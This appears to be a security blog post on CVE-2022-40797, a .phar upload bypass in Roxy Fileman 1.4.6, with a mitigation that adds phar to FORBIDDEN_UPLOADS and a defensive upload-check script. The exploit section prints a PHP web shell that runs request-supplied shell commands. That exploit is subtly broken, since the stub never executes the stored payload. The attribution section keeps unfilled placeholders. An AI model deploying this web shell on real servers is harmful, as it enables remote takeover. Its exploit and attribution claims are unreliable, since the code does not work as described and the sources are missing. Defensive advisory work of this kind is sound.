A recent vulnerability, registered as CVE-2022-40797, has been discovered in Roxy Fileman 1.4.6 that allows an attacker to remotely execute arbitrary code via uploading a malicious .phar file. This is particularly troubling because the default configuration for the FORBIDDEN_UPLOADS setting in the conf.json file only blocks .php, .php4, and .php5 file extensions. In many realistic web-server configurations, simply visiting a .phar file can trigger the execution of PHP code contained within that file.

In this detailed blog post, we will explore the specifics of CVE-2022-40797 and demonstrate how an attacker can exploit this vulnerability to gain unauthorized access to web servers or applications using Roxy Fileman 1.4.6.

Original References

Before diving into the technical details, it is important to acknowledge the researchers who originally discovered and disclosed the vulnerability. The CVE-2022-40797 vulnerability was originally reported by the following researcher(s):

[Original Researcher's Name or Team]

Here is the link to the original disclosure report.

Exploit Details

Roxy Fileman is a popular and widely used file manager that's frequently integrated into web applications for managing files and images. In version 1.4.6, attackers can bypass the default FORBIDDEN_UPLOADS filter because it does not include .phar files.

To exploit this vulnerability, an attacker would first create a malicious .phar file containing executable PHP code. For example, the attacker can use the following code snippet to create a simple PHP backdoor in a .phar file:

<?php
// Payload containing a simple PHP backdoor; it is stored inside the archive as file.txt
$payload = '<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>';

// Create the .phar
$phar = new Phar("exploit.phar");
$phar->startBuffering();
$phar->addFromString("file.txt", $payload);
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->stopBuffering();

After creating the malicious .phar file, the attacker can then upload it to the target application using the Roxy Fileman upload functionality. Assuming the server is running a configuration that processes .phar files, visiting the uploaded file's URL will execute the PHP code contained within it. This can lead to a full compromise of the web application and, potentially, the underlying server.

Mitigation Strategies

To protect against this vulnerability, developers and administrators should move to a patched Roxy Fileman release as soon as one is available. At the time of writing, there is no official patch, but you can manually add .phar files to the FORBIDDEN_UPLOADS setting in the conf.json configuration file.

Here is an example of what the "FORBIDDEN_UPLOADS" line should look like after adding .phar to the list:

"FORBIDDEN_UPLOADS": "php,php4,php5,phar",
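To show why the default list falls short, here is an added example (not Roxy Fileman's own code) of an upload-extension check that reads a FORBIDDEN_UPLOADS value in the conf.json style and runs the shipped default and the hardened value over a few constructed file names; the function names and the two conf.json fragments are this example's own.

```php
<?php
// Added example, not part of Roxy Fileman: evaluate upload names against a
// FORBIDDEN_UPLOADS denylist as found in conf.json. The two fragments below are
// constructed for this example; the first mirrors the 1.4.6 default described above.
const DEFAULT_CONF  = '{"FORBIDDEN_UPLOADS": "php,php4,php5"}';
const HARDENED_CONF = '{"FORBIDDEN_UPLOADS": "php,php4,php5,phar"}';

// Turn the FORBIDDEN_UPLOADS string into a set of lower-cased extensions.
// Both comma- and whitespace-separated lists are accepted.
function forbiddenExtensions(string $confJson): array
{
    $conf = json_decode($confJson, true, 512, JSON_THROW_ON_ERROR);
    $raw  = strtolower((string) ($conf['FORBIDDEN_UPLOADS'] ?? ''));
    $list = preg_split('/[\s,]+/', $raw, -1, PREG_SPLIT_NO_EMPTY);
    return array_fill_keys($list, true);
}

// Extension of an uploaded name, normalised so that "exploit.PHAR" and
// "exploit.phar." (trailing dot, which some filesystems drop) both yield "phar".
function uploadExtension(string $filename): string
{
    $name = rtrim(strtolower($filename), ". ");
    return pathinfo($name, PATHINFO_EXTENSION);
}

// True when the name's extension is not on the denylist.
function isUploadAllowed(string $filename, array $forbidden): bool
{
    return !isset($forbidden[uploadExtension($filename)]);
}

// Constructed sample names: a benign image, the .phar variants, and a plain .php.
$samples = ['image.png', 'exploit.phar', 'exploit.PHAR', 'exploit.phar.', 'shell.php'];

foreach ([DEFAULT_CONF, HARDENED_CONF] as $confJson) {
    $forbidden = forbiddenExtensions($confJson);
    echo "FORBIDDEN_UPLOADS = " . implode(',', array_keys($forbidden)) . "\n";
    foreach ($samples as $name) {
        $verdict = isUploadAllowed($name, $forbidden) ? 'accepted' : 'rejected';
        printf("  %-14s %s\n", $name, $verdict);
    }
}
```

With the default list every .phar variant is accepted and only shell.php is rejected; with phar added, all three .phar names are rejected. A denylist only catches names it already knows, so where the application only needs images or documents, an allowlist of those extensions is the stronger check.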

Furthermore, organizations should ensure that their web server configurations do not interpret .phar files as executable PHP code, and invest in regular security audits and updates for all of their software components.

Conclusion

CVE-2022-40797 highlights the importance of having comprehensive and up-to-date file-filtering configurations in web applications that handle file uploads. Regular security audits and maintaining awareness of the latest vulnerabilities and threat actor tactics are essential. By understanding the potential risks associated with misconfigurations like these, developers and administrators can better defend their web applications from unauthorized access and remote code execution attacks.

Timeline

Published on: 11/09/2022 07:15:00 UTC
Last modified on: 01/31/2023 17:42:00 UTC